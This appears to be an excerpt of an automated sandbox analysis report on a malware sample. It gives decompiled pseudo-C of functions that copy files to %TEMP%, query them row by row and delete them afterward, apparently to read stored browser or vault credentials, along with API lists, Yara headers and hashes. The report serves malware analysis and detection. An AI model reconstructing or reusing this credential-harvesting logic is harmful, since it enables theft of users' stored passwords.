				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				_push(_t226);
				_push(0x411163);
				_push( *[fs:eax]);
				 *[fs:eax] = _t227;
				E00403B80( &_v28);
				_push(_t226);
				_push(0x4110ce);
				_push( *[fs:eax]);
				 *[fs:eax] = _t227;
				E00406FDC(GetTickCount(), __ebx,  &_v52, __esi, _t234);
				_push(_v52);
				E00406F1C( &_v56, __ebx, __edi, __esi, _t234);
				_push(_v56);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t186,  &_v40, _t234);
				E004062D8(L"%TEMP%",  &_v64, _t234);
				_push(_v64);
				_push(0x41119c);
				_push(_v32);
				E00403E1C();
				E0040781C(_v60, _t186,  &_v44, _t234);
				_t87 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t87, 0xffffffff);
				E0040377C( &_v68, _v44);
				E00404AFC(_v68, _t186, _t187,  &_v36, _t224, _t234);
				E00403D2C( &_v72, _v36);
				if(E004076B0(_v72, _t186, _t187) != 0) {
					_t102 =  *0x41b55c; // 0x41c784
					_t104 =  *((intOrPtr*)( *_t102))(E00403990(_v36),  &_v16);
					_t228 = _t227 + 8;
					__eflags = _t104;
					if(_t104 == 0) {
						E00408120(0x66,  &_v76);
						_t147 =  *0x41b5cc; // 0x41c78c
						_t149 =  *((intOrPtr*)( *_t147))(_v16, E00403990(_v76), 0xffffffff,  &_v20,  &_v24);
						_t229 = _t228 + 0x14;
						__eflags = _t149;
						if(_t149 == 0) {
							while(1) {
								_t151 =  *0x41b600; // 0x41c790
								_t153 =  *((intOrPtr*)( *_t151))(_v20);
								__eflags = _t153 - 0x64;
								if(_t153 != 0x64) {
									goto L9;
								}
								_t155 =  *0x41b644; // 0x41c798
								_t159 =  *0x41b588; // 0x41c794
								_t161 =  *((intOrPtr*)( *_t159))(_v20, 3,  *((intOrPtr*)( *_t155))(_v20, 3));
								_pop(_t216);
								E004094C4(_t161,  &_v48, _t216);
								E00403D2C( &_v80, _v48);
								_t166 =  *0x41b588; // 0x41c794
								E00403C98( &_v84,  *((intOrPtr*)( *_t166))(_v20, 0, 0x4111a4, _v80, _v28));
								_t172 =  *0x41b588; // 0x41c794
								E00403C98( &_v88,  *((intOrPtr*)( *_t172))(_v20, 1, 0x4111a4, _v84));
								_t178 =  *0x41b588; // 0x41c794
								_t180 =  *((intOrPtr*)( *_t178))(_v20, 2, 0x4111b0, _v88);
								_t229 = _t229 + 0x28;
								E00403C98( &_v92, _t180);
								_push(_v92);
								_push(L"\r\n\r\n");
								E00403E1C();
								_t184 =  *0x41b584; // 0x41b0b4
								 *_t184 =  *_t184 + 1;
								__eflags =  *_t184;
							}
						}
					}
					L9:
					_t106 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t106))(_v20);
					_t110 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t110))(_v16);
					_pop(_t208);
					 *[fs:eax] = _t208;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t222);
					 *[fs:eax] = _t222;
				}
				_pop(_t210);
				 *[fs:eax] = _t210;
				_push(E0041116A);
				E00403B98( &_v92, 4);
				E004034E4( &_v76);
				E00403B80( &_v72);
				E004034E4( &_v68);
				E00403B98( &_v64, 4);
				E004034E4( &_v48);
				E00403B98( &_v44, 2);
				E004034E4( &_v36);
				E00403B98( &_v32, 2);
				return E00403B80( &_v8);
			}



















































                                                                                                                                                                                              0x00410e70
                                                                                                                                                                                              0x00410e70
                                                                                                                                                                                              0x00410e71
                                                                                                                                                                                              0x00410e73
                                                                                                                                                                                              0x00410e78
                                                                                                                                                                                              0x00410e78
                                                                                                                                                                                              0x00410e7a
                                                                                                                                                                                              0x00410e7c
                                                                                                                                                                                              0x00410e7c
                                                                                                                                                                                              0x00410e7c
                                                                                                                                                                                              0x00410e7f
                                                                                                                                                                                              0x00410e80
                                                                                                                                                                                              0x00410e81
                                                                                                                                                                                              0x00410e82
                                                                                                                                                                                              0x00410e85
                                                                                                                                                                                              0x00410e8b
                                                                                                                                                                                              0x00410e92
                                                                                                                                                                                              0x00410e93
                                                                                                                                                                                              0x00410e98
                                                                                                                                                                                              0x00410e9b
                                                                                                                                                                                              0x00410ea1
                                                                                                                                                                                              0x00410ea8
                                                                                                                                                                                              0x00410ea9
                                                                                                                                                                                              0x00410eae
                                                                                                                                                                                              0x00410eb1
                                                                                                                                                                                              0x00410ebc
                                                                                                                                                                                              0x00410ec1
                                                                                                                                                                                              0x00410ec7
                                                                                                                                                                                              0x00410ecc
                                                                                                                                                                                              0x00410ecf
                                                                                                                                                                                              0x00410edc
                                                                                                                                                                                              0x00410ee7
                                                                                                                                                                                              0x00410ef4
                                                                                                                                                                                              0x00410ef9
                                                                                                                                                                                              0x00410efc
                                                                                                                                                                                              0x00410f01
                                                                                                                                                                                              0x00410f0c
                                                                                                                                                                                              0x00410f17
                                                                                                                                                                                              0x00410f21
                                                                                                                                                                                              0x00410f30
                                                                                                                                                                                              0x00410f3b
                                                                                                                                                                                              0x00410f46
                                                                                                                                                                                              0x00410f51
                                                                                                                                                                                              0x00410f60
                                                                                                                                                                                              0x00410f7c
                                                                                                                                                                                              0x00410f83
                                                                                                                                                                                              0x00410f85
                                                                                                                                                                                              0x00410f88
                                                                                                                                                                                              0x00410f8a
                                                                                                                                                                                              0x00410fa2
                                                                                                                                                                                              0x00410fb4
                                                                                                                                                                                              0x00410fbb
                                                                                                                                                                                              0x00410fbd
                                                                                                                                                                                              0x00410fc0
                                                                                                                                                                                              0x00410fc2
                                                                                                                                                                                              0x00411091
                                                                                                                                                                                              0x00411095
                                                                                                                                                                                              0x0041109c
                                                                                                                                                                                              0x0041109f
                                                                                                                                                                                              0x004110a2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00410fd3
                                                                                                                                                                                              0x00410fe6
                                                                                                                                                                                              0x00410fed
                                                                                                                                                                                              0x00410ff5
                                                                                                                                                                                              0x00410ff6
                                                                                                                                                                                              0x00411004
                                                                                                                                                                                              0x00411017
                                                                                                                                                                                              0x00411028
                                                                                                                                                                                              0x0041103b
                                                                                                                                                                                              0x0041104c
                                                                                                                                                                                              0x0041105f
                                                                                                                                                                                              0x00411066
                                                                                                                                                                                              0x00411068
                                                                                                                                                                                              0x00411070
                                                                                                                                                                                              0x00411075
                                                                                                                                                                                              0x00411078
                                                                                                                                                                                              0x00411085
                                                                                                                                                                                              0x0041108a
                                                                                                                                                                                              0x0041108f
                                                                                                                                                                                              0x0041108f
                                                                                                                                                                                              0x0041108f
                                                                                                                                                                                              0x00411091
                                                                                                                                                                                              0x00410fc2
                                                                                                                                                                                              0x004110a8
                                                                                                                                                                                              0x004110ac
                                                                                                                                                                                              0x004110b3
                                                                                                                                                                                              0x004110ba
                                                                                                                                                                                              0x004110c1
                                                                                                                                                                                              0x004110c6
                                                                                                                                                                                              0x004110c9
                                                                                                                                                                                              0x004110de
                                                                                                                                                                                              0x004110ec
                                                                                                                                                                                              0x00410f62
                                                                                                                                                                                              0x00410f64
                                                                                                                                                                                              0x00410f67
                                                                                                                                                                                              0x00410f67
                                                                                                                                                                                              0x004110f3
                                                                                                                                                                                              0x004110f6
                                                                                                                                                                                              0x004110f9
                                                                                                                                                                                              0x00411106
                                                                                                                                                                                              0x0041110e
                                                                                                                                                                                              0x00411116
                                                                                                                                                                                              0x0041111e
                                                                                                                                                                                              0x0041112b
                                                                                                                                                                                              0x00411133
                                                                                                                                                                                              0x00411140
                                                                                                                                                                                              0x00411148
                                                                                                                                                                                              0x00411155
                                                                                                                                                                                              0x00411162

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00410EB4
                                                                                                                                                                                              • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 004110EC
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CopyCountDeleteTick
                                                                                                                                                                                              • String ID: $%TEMP%$.tmp
                                                                                                                                                                                              • API String ID: 2381671008-2792595090
                                                                                                                                                                                              • Opcode ID: 25513a2d6d90f056bd5cf02fe9c1dff5265798498166ca8350b0b3102dd1fa50
                                                                                                                                                                                              • Instruction ID: ef1d9ef4a41f0d536355ae74e23377fcfc6b42a5aa152db35adc264ec6821d93
                                                                                                                                                                                              • Opcode Fuzzy Hash: 25513a2d6d90f056bd5cf02fe9c1dff5265798498166ca8350b0b3102dd1fa50
                                                                                                                                                                                              • Instruction Fuzzy Hash: 55910B31A40109AFDB00EB95DC82EDEBBB9EF48315F104436F514F72A2DB78AE458B58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0040B15C, Relevance: 9.2, APIs: 6, Instructions: 198libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 49%
                                                                                                                                                                                              			E0040B15C(void* __ebx, void* __edi, void* __esi) {
				_Unknown_base(*)()* _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v52;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				CHAR* _t72;
				_Unknown_base(*)()* _t111;
				intOrPtr* _t157;
				struct HINSTANCE__* _t158;
				signed int _t159;
				void* _t160;
				intOrPtr _t170;
				intOrPtr _t175;
				intOrPtr _t179;
				intOrPtr* _t192;
				void* _t194;
				void* _t195;
				signed int _t200;
				intOrPtr _t202;
				intOrPtr _t203;

				_t202 = _t203;
				_t160 = 0xc;
				do {
					_push(0);
					_push(0);
					_t160 = _t160 - 1;
				} while (_t160 != 0);
				 *[fs:eax] = _t203;
				E00408120(0x9b,  &_v72);
				_t72 = E00403990(_v72);
				E00408120(0x9a,  &_v76);
				_t157 = GetProcAddress(LoadLibraryA(E00403990(_v76)), _t72);
				E0040813C(0x9c,  &_v80);
				 *_t157(E00403D3C(_v80),  &_v52,  *[fs:eax], 0x40b3c3, _t202, __edi, __esi, __ebx, _t160);
				E0040813C(0x9d,  &_v84);
				 *_t157(E00403D3C(_v84),  &_v68);
				E00408120(0x9e,  &_v88);
				_t158 = LoadLibraryA(E00403990(_v88));
				if(_t158 != 0) {
					E00408120(0x9f,  &_v92);
					_t111 = GetProcAddress(_t158, E00403990(_v92));
					E00408120(0xa0,  &_v96);
					_t192 = GetProcAddress(_t158, E00403990(_v96));
					E00408120(0xa1,  &_v100);
					_v8 = GetProcAddress(_t158, E00403990(_v100));
					_v12 = 0;
					_push( &_v16);
					_push(0);
					_push( &_v52);
					if( *_t111() == 0) {
						_push( &_v20);
						_push( &_v12);
						_push(0x200);
						_push(_v16);
						if( *_t192() == 0) {
							_t194 = _v12 - 1;
							if(_t194 >= 0) {
								_t195 = _t194 + 1;
								_t159 = 0;
								do {
									_t179 =  *0x40b130; // 0x40b134
									E004047B4( &_v24, _t179);
									_push( &_v24);
									_push(0);
									_push(0);
									_push(0);
									_t200 = (_t159 << 3) - _t159;
									_push( *((intOrPtr*)(_v20 + 0x18 + _t200 * 8)));
									_push( *((intOrPtr*)(_v20 + 0x14 + _t200 * 8)));
									_push( &_v68);
									_push(_v16);
									if(_v8() == 0) {
										E0040370C( &_v28,  *((intOrPtr*)( *((intOrPtr*)(_v20 + 0x14 + _t200 * 8)) + 0x10)));
										E0040370C( &_v32,  *((intOrPtr*)( *((intOrPtr*)(_v20 + 0x18 + _t200 * 8)) + 0x10)));
										E0040370C( &_v36,  *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x1c)) + 0x10)));
										if(E00403790(_v28) != 0 && E00403790(_v36) != 0) {
											E00408120(0xa2,  &_v104);
											E00405210(0x40b3e8, _t159, _v28, _v104, _t195, _t200, 0x40b3dc, _v36, _v32);
										}
									}
									_t159 = _t159 + 1;
									_t195 = _t195 - 1;
								} while (_t195 != 0);
							}
						}
					}
				}
				_pop(_t170);
				 *[fs:eax] = _t170;
				_push(E0040B3CA);
				E00403508( &_v104, 5);
				E00403B98( &_v84, 2);
				E00403508( &_v76, 2);
				E00403508( &_v36, 3);
				_t175 =  *0x40b130; // 0x40b134
				return E00404224( &_v24, 2, _t175);
			}





































                                                                                                                                                                                              0x0040b15d
                                                                                                                                                                                              0x0040b15f
                                                                                                                                                                                              0x0040b164
                                                                                                                                                                                              0x0040b164
                                                                                                                                                                                              0x0040b166
                                                                                                                                                                                              0x0040b168
                                                                                                                                                                                              0x0040b168
                                                                                                                                                                                              0x0040b17a
                                                                                                                                                                                              0x0040b185
                                                                                                                                                                                              0x0040b18d
                                                                                                                                                                                              0x0040b19b
                                                                                                                                                                                              0x0040b1b4
                                                                                                                                                                                              0x0040b1c2
                                                                                                                                                                                              0x0040b1d0
                                                                                                                                                                                              0x0040b1de
                                                                                                                                                                                              0x0040b1ec
                                                                                                                                                                                              0x0040b1f6
                                                                                                                                                                                              0x0040b209
                                                                                                                                                                                              0x0040b20d
                                                                                                                                                                                              0x0040b21b
                                                                                                                                                                                              0x0040b22a
                                                                                                                                                                                              0x0040b239
                                                                                                                                                                                              0x0040b24d
                                                                                                                                                                                              0x0040b257
                                                                                                                                                                                              0x0040b26b
                                                                                                                                                                                              0x0040b270
                                                                                                                                                                                              0x0040b276
                                                                                                                                                                                              0x0040b277
                                                                                                                                                                                              0x0040b27c
                                                                                                                                                                                              0x0040b281
                                                                                                                                                                                              0x0040b28a
                                                                                                                                                                                              0x0040b28e
                                                                                                                                                                                              0x0040b28f
                                                                                                                                                                                              0x0040b297
                                                                                                                                                                                              0x0040b29c
                                                                                                                                                                                              0x0040b2a5
                                                                                                                                                                                              0x0040b2a8
                                                                                                                                                                                              0x0040b2ae
                                                                                                                                                                                              0x0040b2af
                                                                                                                                                                                              0x0040b2b1
                                                                                                                                                                                              0x0040b2b4
                                                                                                                                                                                              0x0040b2ba
                                                                                                                                                                                              0x0040b2c2
                                                                                                                                                                                              0x0040b2c3
                                                                                                                                                                                              0x0040b2c5
                                                                                                                                                                                              0x0040b2c7
                                                                                                                                                                                              0x0040b2ce
                                                                                                                                                                                              0x0040b2d7
                                                                                                                                                                                              0x0040b2df
                                                                                                                                                                                              0x0040b2e3
                                                                                                                                                                                              0x0040b2e7
                                                                                                                                                                                              0x0040b2ed
                                                                                                                                                                                              0x0040b2fc
                                                                                                                                                                                              0x0040b30e
                                                                                                                                                                                              0x0040b31f
                                                                                                                                                                                              0x0040b32e
                                                                                                                                                                                              0x0040b351
                                                                                                                                                                                              0x0040b361
                                                                                                                                                                                              0x0040b361
                                                                                                                                                                                              0x0040b32e
                                                                                                                                                                                              0x0040b366
                                                                                                                                                                                              0x0040b367
                                                                                                                                                                                              0x0040b367
                                                                                                                                                                                              0x0040b2b1
                                                                                                                                                                                              0x0040b2a8
                                                                                                                                                                                              0x0040b29c
                                                                                                                                                                                              0x0040b281
                                                                                                                                                                                              0x0040b370
                                                                                                                                                                                              0x0040b373
                                                                                                                                                                                              0x0040b376
                                                                                                                                                                                              0x0040b383
                                                                                                                                                                                              0x0040b390
                                                                                                                                                                                              0x0040b39d
                                                                                                                                                                                              0x0040b3aa
                                                                                                                                                                                              0x0040b3b2
                                                                                                                                                                                              0x0040b3c2

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000,00000000,00000000,0040B3C3,?,00000000,0041B0FC,00000000,0000000B,00000000,00000000,?,0040B405,00000000,0040B40F), ref: 0040B1A9
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B1AF
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000,?,00000000,0041B0FC,00000000,0000000B,00000000,00000000,?,0040B405,00000000,0040B40F,?,00000000,0041B0FC,00000000), ref: 0040B204
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B22A
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B248
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B266
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2238633743-0
                                                                                                                                                                                              • Opcode ID: 695678cf7ca45a9e7c8b3b2878ade717b4a60ccd5b1908c8415a47cf5bea5569
                                                                                                                                                                                              • Instruction ID: 364380f0d352aef1bf1129e1f4ec87a81fdd7fa01391a9152c5138518fa9ee90
                                                                                                                                                                                              • Opcode Fuzzy Hash: 695678cf7ca45a9e7c8b3b2878ade717b4a60ccd5b1908c8415a47cf5bea5569
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5761E375A002099BDB01EBE5C985E9EB7BDFF44304F50453AB900FB385DA78EE0587A8
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00401934, Relevance: 9.1, APIs: 6, Instructions: 62COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                                                              			E00401934() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x41c5ac == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(E00401A0A);
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x41c035 != 0) {
						_push(0x41c5b4);
						L004011CC();
					}
					 *0x41c5ac = 0;
					_t3 =  *0x41c60c; // 0x0
					LocalFree(_t3);
					 *0x41c60c = 0;
					_t19 =  *0x41c5d4; // 0x41c5d4
					while(_t19 != 0x41c5d4) {
						_t1 = _t19 + 8; // 0x0
						VirtualFree( *_t1, 0, 0x8000);
						_t19 =  *_t19;
					}
					E00401234(0x41c5d4);
					E00401234(0x41c5e4);
					E00401234(0x41c610);
					_t14 =  *0x41c5cc; // 0x0
					while(_t14 != 0) {
						 *0x41c5cc =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x41c5cc; // 0x0
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401a11);
					if( *0x41c035 != 0) {
						_push(0x41c5b4);
						L004011D4();
					}
					_push(0x41c5b4);
					L004011DC();
					return 0;
				}
			}










                                                                                                                                                                                              0x00401935
                                                                                                                                                                                              0x0040193f
                                                                                                                                                                                              0x00401a13
                                                                                                                                                                                              0x00401945
                                                                                                                                                                                              0x00401947
                                                                                                                                                                                              0x00401948
                                                                                                                                                                                              0x0040194d
                                                                                                                                                                                              0x00401950
                                                                                                                                                                                              0x0040195a
                                                                                                                                                                                              0x0040195c
                                                                                                                                                                                              0x00401961
                                                                                                                                                                                              0x00401961
                                                                                                                                                                                              0x00401966
                                                                                                                                                                                              0x0040196d
                                                                                                                                                                                              0x00401973
                                                                                                                                                                                              0x0040197a
                                                                                                                                                                                              0x0040197f
                                                                                                                                                                                              0x00401999
                                                                                                                                                                                              0x0040198e
                                                                                                                                                                                              0x00401992
                                                                                                                                                                                              0x00401997
                                                                                                                                                                                              0x00401997
                                                                                                                                                                                              0x004019a6
                                                                                                                                                                                              0x004019b0
                                                                                                                                                                                              0x004019ba
                                                                                                                                                                                              0x004019bf
                                                                                                                                                                                              0x004019c6
                                                                                                                                                                                              0x004019ca
                                                                                                                                                                                              0x004019d1
                                                                                                                                                                                              0x004019d6
                                                                                                                                                                                              0x004019db
                                                                                                                                                                                              0x004019e1
                                                                                                                                                                                              0x004019e4
                                                                                                                                                                                              0x004019e7
                                                                                                                                                                                              0x004019f3
                                                                                                                                                                                              0x004019f5
                                                                                                                                                                                              0x004019fa
                                                                                                                                                                                              0x004019fa
                                                                                                                                                                                              0x004019ff
                                                                                                                                                                                              0x00401a04
                                                                                                                                                                                              0x00401a09
                                                                                                                                                                                              0x00401a09

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,00401A0A), ref: 00401961
                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00000000,00401A0A), ref: 00401973
                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401A0A), ref: 00401992
                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401A0A), ref: 004019D1
                                                                                                                                                                                              • RtlLeaveCriticalSection.KERNEL32(0041C5B4,00401A11,00000000,00000000,00401A0A), ref: 004019FA
                                                                                                                                                                                              • RtlDeleteCriticalSection.KERNEL32(0041C5B4,00401A11,00000000,00000000,00401A0A), ref: 00401A04
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3782394904-0
                                                                                                                                                                                              • Opcode ID: a533093bf643e2750fc0c7fb6ce1a8cee2193e72f340cc35e9b9a59fd34ff9a9
                                                                                                                                                                                              • Instruction ID: f5b3729ab89c308c15893b8da70c4d7314be5901088e834fcff69d5c90a64892
                                                                                                                                                                                              • Opcode Fuzzy Hash: a533093bf643e2750fc0c7fb6ce1a8cee2193e72f340cc35e9b9a59fd34ff9a9
                                                                                                                                                                                              • Instruction Fuzzy Hash: F11193B17843907ED715AB669CD1B927B969745708F50807BF100BA2F1C73DA840CF5D
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00410BB8, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 198fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 46%
                                                                                                                                                                                              			E00410BB8(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				WCHAR* _t76;
				intOrPtr* _t91;
				void* _t93;
				intOrPtr* _t95;
				intOrPtr* _t99;
				intOrPtr* _t132;
				void* _t134;
				intOrPtr* _t136;
				void* _t138;
				intOrPtr* _t140;
				intOrPtr* _t146;
				void* _t148;
				void* _t154;
				intOrPtr _t174;
				intOrPtr _t176;
				intOrPtr _t184;
				intOrPtr _t188;
				intOrPtr _t189;
				void* _t190;
				void* _t191;

				_t186 = __esi;
				_t153 = __ebx;
				_t188 = _t189;
				_t154 = 9;
				do {
					_push(0);
					_push(0);
					_t154 = _t154 - 1;
					_t193 = _t154;
				} while (_t154 != 0);
				_push(_t154);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				_push(_t188);
				_push(0x410e20);
				_push( *[fs:eax]);
				 *[fs:eax] = _t189;
				E00403B80( &_v28);
				_push(_t188);
				_push(0x410da0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t189;
				E00406FDC(GetTickCount(), __ebx,  &_v48, __esi, _t193);
				_push(_v48);
				E00406F1C( &_v52, __ebx, __edi, __esi, _t193);
				_push(_v52);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t153,  &_v40, _t193);
				E004062D8(L"%TEMP%",  &_v60, _t193);
				_push(_v60);
				_push(E00410E58);
				_push(_v32);
				E00403E1C();
				E0040781C(_v56, _t153,  &_v44, _t193);
				_t76 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t76, 0xffffffff);
				E0040377C( &_v64, _v44);
				E00404AFC(_v64, _t153, _t154,  &_v36, _t186, _t193);
				E00403D2C( &_v68, _v36);
				if(E004076B0(_v68, _t153, _t154) != 0) {
					_t91 =  *0x41b55c; // 0x41c784
					_t93 =  *((intOrPtr*)( *_t91))(E00403990(_v36),  &_v16);
					_t190 = _t189 + 8;
					__eflags = _t93;
					if(_t93 == 0) {
						E00408120(0x65,  &_v72);
						_t132 =  *0x41b5cc; // 0x41c78c
						_t134 =  *((intOrPtr*)( *_t132))(_v16, E00403990(_v72), 0xffffffff,  &_v20,  &_v24);
						_t191 = _t190 + 0x14;
						__eflags = _t134;
						if(_t134 == 0) {
							while(1) {
								_t136 =  *0x41b600; // 0x41c790
								_t138 =  *((intOrPtr*)( *_t136))(_v20);
								__eflags = _t138 - 0x64;
								if(_t138 != 0x64) {
									goto L9;
								}
								_t140 =  *0x41b588; // 0x41c794
								E00403C98( &_v76,  *((intOrPtr*)( *_t140))(_v20, 0, _v28));
								_t146 =  *0x41b588; // 0x41c794
								_t148 =  *((intOrPtr*)( *_t146))(_v20, 1, E00410E60, _v76);
								_t191 = _t191 + 0x10;
								E00403C98( &_v80, _t148);
								_push(_v80);
								_push(E00410E68);
								E00403E1C();
							}
						}
					}
					L9:
					_t95 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t95))(_v20);
					_t99 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t99))(_v16);
					_pop(_t174);
					 *[fs:eax] = _t174;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t184);
					 *[fs:eax] = _t184;
				}
				_pop(_t176);
				 *[fs:eax] = _t176;
				_push(E00410E27);
				E00403B98( &_v80, 2);
				E004034E4( &_v72);
				E00403B80( &_v68);
				E004034E4( &_v64);
				E00403B98( &_v60, 6);
				E004034E4( &_v36);
				E00403B98( &_v32, 2);
				return E00403B80( &_v8);
			}










































                                                                                                                                                                                              0x00410bb8
                                                                                                                                                                                              0x00410bb8
                                                                                                                                                                                              0x00410bb9
                                                                                                                                                                                              0x00410bbb
                                                                                                                                                                                              0x00410bc0
                                                                                                                                                                                              0x00410bc0
                                                                                                                                                                                              0x00410bc2
                                                                                                                                                                                              0x00410bc4
                                                                                                                                                                                              0x00410bc4
                                                                                                                                                                                              0x00410bc4
                                                                                                                                                                                              0x00410bc7
                                                                                                                                                                                              0x00410bc8
                                                                                                                                                                                              0x00410bc9
                                                                                                                                                                                              0x00410bca
                                                                                                                                                                                              0x00410bcb
                                                                                                                                                                                              0x00410bce
                                                                                                                                                                                              0x00410bd4
                                                                                                                                                                                              0x00410bdb
                                                                                                                                                                                              0x00410bdc
                                                                                                                                                                                              0x00410be1
                                                                                                                                                                                              0x00410be4
                                                                                                                                                                                              0x00410bea
                                                                                                                                                                                              0x00410bf1
                                                                                                                                                                                              0x00410bf2
                                                                                                                                                                                              0x00410bf7
                                                                                                                                                                                              0x00410bfa
                                                                                                                                                                                              0x00410c05
                                                                                                                                                                                              0x00410c0a
                                                                                                                                                                                              0x00410c10
                                                                                                                                                                                              0x00410c15
                                                                                                                                                                                              0x00410c18
                                                                                                                                                                                              0x00410c25
                                                                                                                                                                                              0x00410c30
                                                                                                                                                                                              0x00410c3d
                                                                                                                                                                                              0x00410c42
                                                                                                                                                                                              0x00410c45
                                                                                                                                                                                              0x00410c4a
                                                                                                                                                                                              0x00410c55
                                                                                                                                                                                              0x00410c60
                                                                                                                                                                                              0x00410c6a
                                                                                                                                                                                              0x00410c79
                                                                                                                                                                                              0x00410c84
                                                                                                                                                                                              0x00410c8f
                                                                                                                                                                                              0x00410c9a
                                                                                                                                                                                              0x00410ca9
                                                                                                                                                                                              0x00410cc5
                                                                                                                                                                                              0x00410ccc
                                                                                                                                                                                              0x00410cce
                                                                                                                                                                                              0x00410cd1
                                                                                                                                                                                              0x00410cd3
                                                                                                                                                                                              0x00410ceb
                                                                                                                                                                                              0x00410cfd
                                                                                                                                                                                              0x00410d04
                                                                                                                                                                                              0x00410d06
                                                                                                                                                                                              0x00410d09
                                                                                                                                                                                              0x00410d0b
                                                                                                                                                                                              0x00410d67
                                                                                                                                                                                              0x00410d6b
                                                                                                                                                                                              0x00410d72
                                                                                                                                                                                              0x00410d75
                                                                                                                                                                                              0x00410d78
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00410d18
                                                                                                                                                                                              0x00410d29
                                                                                                                                                                                              0x00410d3c
                                                                                                                                                                                              0x00410d43
                                                                                                                                                                                              0x00410d45
                                                                                                                                                                                              0x00410d4d
                                                                                                                                                                                              0x00410d52
                                                                                                                                                                                              0x00410d55
                                                                                                                                                                                              0x00410d62
                                                                                                                                                                                              0x00410d62
                                                                                                                                                                                              0x00410d67
                                                                                                                                                                                              0x00410d0b
                                                                                                                                                                                              0x00410d7a
                                                                                                                                                                                              0x00410d7e
                                                                                                                                                                                              0x00410d85
                                                                                                                                                                                              0x00410d8c
                                                                                                                                                                                              0x00410d93
                                                                                                                                                                                              0x00410d98
                                                                                                                                                                                              0x00410d9b
                                                                                                                                                                                              0x00410db0
